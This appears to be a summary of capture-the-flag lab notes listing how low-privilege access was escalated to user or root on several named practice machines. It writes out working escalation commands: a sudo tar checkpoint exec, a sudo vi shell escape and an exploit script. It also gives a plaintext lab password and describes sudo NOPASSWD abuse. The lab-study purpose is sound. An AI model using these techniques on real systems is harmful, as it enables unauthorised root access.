This file summarizes web/low-privilege to user pivots found in the notes. Each entry includes: source note path, pivot command(s) used, and resulting user.
Source: Linux/TartarSauce/notes.txt
Pivot command:
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Result: spawned a shell as onuma (whoami => onuma)
Source: Linux/Magic/notes.txt
Pivot command:
su theseus
(password from DB: Th3s3usW4sK1ng)
Result: authenticated as theseus and obtained shell.
Source: Linux/Popcorn/notes.txt
Pivot command:
./14339.sh
Result: root shell (root@popcorn:/tmp#) and root.txt accessible.
Source: Linux/SwagShop/notes.txt
Pivot command:
sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
Result: root shell via sudo vi escape.
Source: Linux/Nibbles/notes.txt
Pivot detail:
User nibbler allowed to run /home/nibbler/personal/stuff/monitor.sh as root (NOPASSWD). Created monitor.sh to spawn a root shell.
Result: root via sudo NOPASSWD exploitation.
Source: Linux/Bashed/notes.txt
Pivot detail:
www-data may run commands as scriptmanager (NOPASSWD). Used sudo to execute commands as scriptmanager and pivot.
Result: shell as scriptmanager.
Source: Linux/SolidState/notes.txt
Pivot detail:
Reverse shell connected back and subsequently a root shell observed.
Result: root access.
Notes: This summary lists explicit pivots found in the repository notes. For each pivot, verify exact command history in the referenced note files when reproducing.